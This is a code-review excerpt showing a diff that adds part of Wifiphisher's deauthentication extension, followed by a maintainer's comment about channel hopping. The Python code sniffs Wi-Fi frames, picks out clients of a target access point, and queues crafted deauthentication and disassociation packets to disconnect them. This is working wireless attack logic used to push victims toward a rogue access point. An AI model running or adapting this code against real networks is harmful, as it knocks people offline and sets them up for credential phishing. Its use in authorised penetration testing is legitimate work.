wifiphisher/extensions/deauth.py

```diff
@@ -0,0 +1,151 @@
+        Process the Dot11 packets and add any desired clients to observed_clients.
+
+        :param self: A Deauthentication object.
+        :param packet: A scapy.layers.RadioTap object.
+        :type self: Deauthentication
+        :type packet: scapy.layers.RadioTap
+        :return: list with the crafted Deauth/Disas packets
+        :rtype: list
+        .. note: addr1 = Destination address
+                 addr2 = Sender address
+                 Also this finds devices that are not associated with any
+                 access point as they respond to the access point probes.
+        """
+
+        # check if the packet has a dot11 layer
+        if packet.haslayer(dot11.Dot11):
+            # get the sender and receiver
+            receiver = packet.addr1
+            sender = packet.addr2
+
+            # create a list of addresses that are not acceptable
+            non_valid_list = self._non_client_addresses + self._observed_clients
+
+            # if sender or receirver is valid and not already a
+            # discovered client check to see if either one is a client
+            if receiver not in non_valid_list and sender not in non_valid_list:
+                # in case the receiver is the access point
+                if receiver == self._data.target_ap_bssid:
+                    # add the sender to the client list
+                    self._observed_clients.append(sender)
+
+                    # create and add deauthentication packets for client
+                    self.packets_to_send += self._craft_packet(
+                        sender, self._data.target_ap_bssid)
+                    self.packets_to_send += self._craft_packet(
+                        self._data.target_ap_bssid, sender)
+
+                # in case the sender is the access point
+                elif sender == self._data.target_ap_bssid:
+                    # add the receiver to the client list
+                    self._observed_clients.append(receiver)
+
+                    # create and add deauthentication packets for client
+                    self.packets_to_send += self._craft_packet(
+                        receiver, self._data.target_ap_bssid)
+                    self.packets_to_send += self._craft_packet(
+                        self._data.target_ap_bssid, receiver)
+
+        return ([self._data.target_ap_channel], self.packets_to_send)
+
+    def send_output(self):
+        """
+        Get all the observed clients.
+
+        :param self: A Deauthentication object.
+        :type self: Deauthentication
+        :return: A list with all the Deauth/Disas entries.
+        :rtype: list
+        """
+
+        return ["DEAUTH/DISAS - " + c for c in self._observed_clients]
+
+    def send_channels(self):
+        """
+        Send channes to subscribe.
+
+        :param self: A Deauthentication object.
+        :type self: Deauthentication
+        :return: A list with all interested channels.
+        :rtype: list
+        """
+
```

Comment:
I implemented channel hopping in the `ExtensionManager`, the `deauth` module needs to leverage that now. Feel free to make a patch after this gets merged. ;)